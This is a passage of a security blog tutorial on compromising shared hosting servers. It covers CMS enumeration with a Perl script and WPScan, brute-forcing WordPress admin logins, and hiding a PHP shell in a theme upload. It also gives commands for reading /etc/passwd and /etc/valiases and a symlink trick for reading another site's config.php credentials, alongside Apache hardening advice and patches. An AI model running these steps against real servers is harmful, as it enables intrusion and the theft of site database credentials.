    if($num == 0){return;}
    $ip = $rr[0]->address;
    if($ip eq $server_ip)
    {
        return 1;
    }
    else
    {
        return 0;
    }
}
sub countlines()
{
    $lines=0;
    open(PLUGINS,'<','plugins.txt') || die("couldn't read from the file with error: $!\n");
    $lines++ while();
    return $lines;
}
Attacking the CMS

After the list of sites is generated, now specific sub lists can be created based on the type of CMS.
  1. All the sites running WordPress.
  2. All the sites running Joomla.
The Perl Script above can be extended to grab information about other commonly used CMS as well.
This is the next step that is similar to information gathering phase. There are well-known vulnerability scanners for the CMS, WordPress and Joomla available.
Besides this, the exploit archives on sites, such as exploit-db.com, can also be used as a reference to look up the exploit corresponding to the CMS version.
I will provide here few examples of how a vulnerability scanner for the WordPress CMS can be used to gather more details for compromising it.
A vulnerability scanner such as WPScan, which is developed in Ruby and comes by default with Backtrack, can be used to perform a quick information gathering scan of the WordPress Site.
  1. List the plugins running on the WordPress
  2. List the themes running on the site.
  3. Display any TimThumbs found on the site.
  4. Enumerate all the usernames found.
In the screenshot below, you can see various attack vectors gathered using WPScan:

One of the most common ways used by attackers to break into CMS Admin Panels is by bruteforcing. The fact that many administrators do not use strong passwords is exploited.
An example attack would be to bruteforce the admin account of WordPress using a list of commonly used passwords. If the WordPress Login Page lacks a captcha protection, it can easily be bruteforced using WPScan itself.
Below screenshot is an example where the WordPress Admin Password was cracked successfully using WPScan and a list of commonly used passwords.

As can be seen, the password for the admin account was cracked successfully. Based on the strength of your wordlist there is a high probability that the passwords of wordpress admin accounts will be cracked successfully.
Upload your shell to the server

One of the most common ways of uploading a shell to the server is through the Admin Panel. Most CMS offer a lot of functionality to the administrator through the Admin Panel. Functionalities such as installing a new theme, a new plugin, editing the source files used by the themes and the plugins are very powerful features.
How can an attacker exploit this?
If we again consider the example of WordPress CMS, then below are some of the ways an attacker can upload the shell to WordPress:
  1. Upload a new theme to the WordPress Site. In the theme.zip file, the malicious PHP shell can be inserted and uploaded. WordPress has a feature that allows you to install a theme automatically by browsing for an archive file containing the files specific for a theme.
    The screenshot below shows how a malicious theme can be uploaded by an attacker to the WordPress CMS.

    The attacker browses to the location inside Admin Panel where the option to upload a new Theme is provided. In our case, we are uploading a theme called “buttercream” present in the archive file: buttercream.zip
    This archive file contains all the necessary files for this theme. We have inserted a malicious PHP shell in this archive called az.php.
    The screenshot shows a code snippet of the az.php shell.
    Once you install this theme successfully on the victim’s wordpress site, you can access the shell from the Browser by going to the location:
    http://victimsite.com/wp-content/themes/buttercream/az.php
  2. It can also be done by manually inserting the PHP Shell code in the existing files of WordPress themes and plugins. They will be executed manually by the site when the page loads.
Now that we have uploaded a shell, we can execute Linux commands on the Web server.
Let us first try to gather some more details about the server and the current access that we have.
We are unable to read other sites’ home directories right now because we do not have root access.
Common Linux Commands used in PHP Shells

PHP Shells often make use of functions like system(), shell_exec(), exec() and similar other functions to execute system code.
If these functions are not disabled in the PHP Installation of the server, then attacker can easily run any Linux commands they wish.
We will quickly look at some of the commands useful to an attacker. This is more than just a reference of the commands. It helps us understand what specific information an attacker looks for after uploading a shell.
uname –a

Linux studio4 2.6.18-274.12.1.el5 #1 SMP Tue Nov 29 13:37:46 EST 2011 x86_64 x86_64 x86_64 GNU/Linux

The most important information we get from this is the version of Linux Kernel: 2.6.18-274.12.1.el5
It will be useful for us to root the server by exploiting this version of Linux Kernel.
Id
This command will show the current user’s UID and GID corresponding to the entry for this user in /etc/passwd file of the Linux server.
It is important to note that the PHP Shell, which you have uploaded to the server, and the commands being executed are all under the context of this user. So, all the access restrictions in place for this user are applied to you as well.
uid=48(apache) gid=48(apache) groups=48(apache)

This means that our shell is running in the context of the user, “apache” with a UID of 48 and GID of 48.
Cat /etc/passwd

/etc/passwd is world readable. So, even without root access, we are able to read the contents of this file. This is important for an attacker to know the various other users existing on the current server along with their home directory locations.
Example output:
bruce:x:502:502::/home/bruce:/bin/bash

Usually on a shared hosting server, every site runs under a different user account. Each user has their own home directory. All the files corresponding to their site will be stored under their home directory.
The main objective of the attacker is to gain access (read only at the very least) to these files.
/etc/valiases

This file will store a mapping between the name of all the sites running on the server and their corresponding user accounts in the /etc/passwd file.
Why is this information important to the attacker?
Let us take the previous example one step further to understand it better.
Consider that the user “bruce” has a site called http://bruceparadise.com running on this shared hosting server.
The attacker may know that there is a site called bruceparadise.com running on the same server because of the information gathered from Reverse IP Lookup.
However, he may not know the user account under which this site is running.
Let us assume that he was unable to find any Full Path Disclosure on the site, so he is unaware of the home directory of the website.
In such cases, /etc/valiases file can be very useful.
By running a command like this:
Ls /etc/valiases/bruceparadise.com
It will tell us the corresponding username under which this site is running.
-rw-r—– 1 bruce Mar 9 16:14 /etc/valiases/bruceparadise.com
Using the corresponding entry for bruce in /etc/passwd, we now know that the home directory for the site, bruceparadise.com is: /home/bruce/public_html

Cat /etc/named.conf

Named.conf contains a list of zones and the path to the files used by named to control these domains.
The most important information from this file is the site names. Combine it with /etc/valiases and /etc/passwd and you have a clean list of all the sites on the server along with each sites’ Home Directory.
A short snippet from a server’s named.conf file is given below:

A Real Time Scenario

Bruceparadise.com provides an option for the users to register to view the content. All the details of the users are stored in the backend database.
Each time a user logs in; their credentials have to be verified against the information present in the database. In order to do this, the site needs to establish a connection to the database.
Usually these details are present in files like config.php, settings.php and so on.
Again, we can gather this information by understanding the type of software used by the site and then looking up the source code from repositories.
In our case,
http://bruceparadise.com/includes/config.php
The attacker wants to read the config.php details to get the sensitive information for connecting to the MySQL Database.
Full Path to the file: /home/bruce/public_html/includes/config.php

Here comes the interesting part, if we try running the following command to view the file contents:
Cat /home/bruce/public_html/includes/config.php

It will not display the output.
The reason for this is that we are trying to read the contents of another user’s home directory under the context of Current User.
Now, we look at one of the most common ways used by attackers to gain read only access to all the sites on the server.
Bypass Server Protection using Symlink

Most of the servers will not allow you to view the home directories of other users on the server.
A symlink is established by the attacker on the server. Using this symlink, he can now view the home directories of any other user on the server.
Apache Web servers allow few options to disable/enable the access to the user to follow the symlinks.
The Apache option of interest to an attacker is FollowSymlinks. As opposed to SymlinksIfOwnerMatch option, this option does not check for the file ownership when a request to read the file is made from another user account.
These options can be configured in two places:
  1. Apache Web server’s httpd.conf file: The options can be disabled in the Apache Web server’s configuration file. It can also be specified whether these options can be overridden by directory specific .htaccess files or not.
    Below sample configuration from httpd.conf will disable the use of FollowSymlinks in the server and at the same time disallow this option to be re-enabled in .htaccess files.
1
2
3
4
<Directory "/home">
 Options +All -FollowSymLinks +IncludesNOEXEC -Indexes +MultiViews +SymLinksIfOwnerMatch
 AllowOverride All Options=ExecCGI,Includes,IncludesNOEXEC,Indexes,MultiViews,SymLinksIfOwnerMatch
</Directory>
As specified in the list of options above, only those Options can be overridden by directory specific .htaccess files. FollowSymLinks has been disabled explicitly.
  1. Directory specific .htaccess files: If the Web server allows you to override FollowSymlinks directive, then the attacker can manually enable FollowSymLinks option in the directory to which he has write access.
    A simple way to do this:
    1. Mkdir lnk – create a directory called lnk in the current directory.
    2. Create a .htaccess file in the lnk directory with the following contents:
      Options +FollowSymLinks
    3. Establish the symlink to config.php (in the example above) as shown below:
      Ln –s /home/bruce/public_html/includes/config.php /home/victim/public_html/lnk/00.txt
      This command will establish a symlink from 00.txt to config.php of bruce user’s directory.
      We can easily view the configuration by doing:
      Cat 00.txt
      A few misconceptions about Symlinks

      A few web administrators feel that performing the following functions will prevent the attacker from creating a symlink:
      1. Disable the symlink() function in PHP.ini’s disable_function setting.
      2. Disable the use of /bin/ln by a non-root user to create a symlink.
      Why these measures will fail to secure your server?
      It is because symlinks is a functionality provided by the Linux Kernel. /bin/ln provides you a way to perform the symlink. However, this same functionality can be programmed with any Interpreted language like Perl, Python or Ruby.
      An attacker can run these scripts to establish the symlink as well.
Solutions for Protecting from Symlink Attacks

In the past few years, a lot of servers and sites running on the servers have been compromised because of Symlink Bypass on the Apache server. This was mainly due to the reason that attackers were allowed to override the Symlink setting in .htaccess files.
Several solutions have been provided for this problem either in the form of a patch that needs to be applied to the Apache Web server or a setting that needs to be enabled in your Web Hosting Manager.
Some patches of interest:
  1. Rack911 Patch: It makes a change at the Apache code level (in httpd) and modifies the way Apache Web server uses the FollowSymlinks option. It is automatically translated to SymlinksIfOwnerMatch.
    http://layer1.rack911.com/harden-symlinks.patch
    It is still vulnerable to the Race Condition in Symlinks.
  2. Bluehost patch: A better solution, which fixes the race condition issue as well.
    http://mail-archives.apache.org/mod_mbox/httpd-dev/201210.mbox/raw/%3c5090AD37.1070303@bluehost.com%3e/2
    Bad Neighbor on a shared hosting server
At times, when the attackers are unable to find any vulnerability on the sites or the server, if they are really determined to hack the server, they can purchase hosting from the server.
Based on the kind of sites hosted on the server, if they are of financial interest to the Hacker, then spending a few dollars to purchase hosting is worth it for them.
Once a hosting account is created for them, they can perform the same steps as mentioned above to gain access to the complete server. Since, they already control one Site on the server; it makes it very easy to proceed with the attack.
Conclusion

After reading and understanding the common methods used by Hackers to attack shared hosting servers and compromise the sites, it should help you in protecting yourself better.
If you are a Security Professional or a Security Enthusiast and own a site on a shared hosting server, you can perform a small audit on the server to see if it is indeed vulnerable and allows you to read files of other sites on the same server. If it is, you can inform the Hosting Provider about this and help them harden the server before a malicious Attacker takes control of it.
References

http://httpd.apache.org/docs/2.2/mod/core.html
http://whmscripts.net/misc/2013/apache-symlink-security-issue-fixpatch/





About the Author
c0d3inj3cT is an Information Security Professional and has a strong interest in various areas of Information Security ranging from Reverse Engineering, Cryptography, Malware Analysis, latest online threats to Web Application Security, Password Security. His other interests include working in GPGPU related tasks like Cryptographic Hashing Algorithm Cracking and Crypto Currencies.



Ads 468x60px

Social Icons

Featured Posts